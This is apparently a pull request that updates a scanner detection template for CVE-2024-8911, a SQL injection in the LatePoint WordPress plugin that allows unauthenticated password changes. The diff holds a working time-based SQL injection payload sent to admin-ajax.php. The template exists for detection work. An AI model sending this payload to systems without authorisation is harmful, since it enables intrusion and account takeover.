### PR TITLE
Add CVE-2024-8911 (vKEV)

### DIFF
--- a/http/cves/2024/CVE-2024-8911.yaml
+++ b/http/cves/2024/CVE-2024-8911.yaml
@@ -1,7 +1,7 @@
 id: CVE-2024-8911
 
 info:
-  name: LatePoint <= 5.0.11 – Unauthenticated Arbitrary User Password Change via SQL Injection
+  name: LatePoint <= 5.0.11 - SQL Injection
   author: daffainfo
   severity: critical
   description: |
@@ -22,7 +22,7 @@ info:
     vendor: latepoint
     product: latepoint
     framework: wordpress
-  tags: cve,cve2024,wordpress,wp,wp-plugin,wp,vkev,intrusive,latepoint,sqli,vkev,kev
+  tags: cve,cve2024,wordpress,wp,wp-plugin,wp,vkev,intrusive,latepoint,sqli,kev
 
 flow: http(1) && http(2)
 
@@ -44,16 +44,18 @@ http:
 
   - raw:
       - |
+        @timeout: 30s
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        action=latepoint_route_call&route_name=customer_cabinet__change_password&params=password_reset_token%5bOR%5d%5b%20IS%20NULL%20or%20not%20(select%20sleep(6)))%20limit%201%3b--%20-%5d%3d{{randstr}}%26password%3d{{randstr}}&return_format=json
+        action=latepoint_route_call&route_name=customer_cabinet__change_password&params=password_reset_token%5bOR%5d%5b%20IS%20NULL%20or%20not%20(select%20sleep(8)))%20limit%201%3b--%20-%5d%3d{{randstr}}%26password%3d{{randstr}}&return_format=json
 
     matchers:
       - type: dsl
         dsl:
-          - 'duration >= 6'
+          - 'duration >= 8'
           - 'status_code == 200'
           - 'contains(body, "\"status\":\"error\"")'
+          - 'contains(content_type, "application/json")'
         condition: and


### PR DESCRIPTION
### PR Information

The LatePoint plugin for WordPress is vulnerable to Arbitrary User Password Change via SQL Injection in versions up to, and including, 5.0.11. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note that changing a WordPress user's password is only possible if the "Use WordPress users as customers" setting is enabled, which is disabled by default. Without this setting enabled, only the passwords of plugin customers, which are stored and managed in a separate database table, can be modified.

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)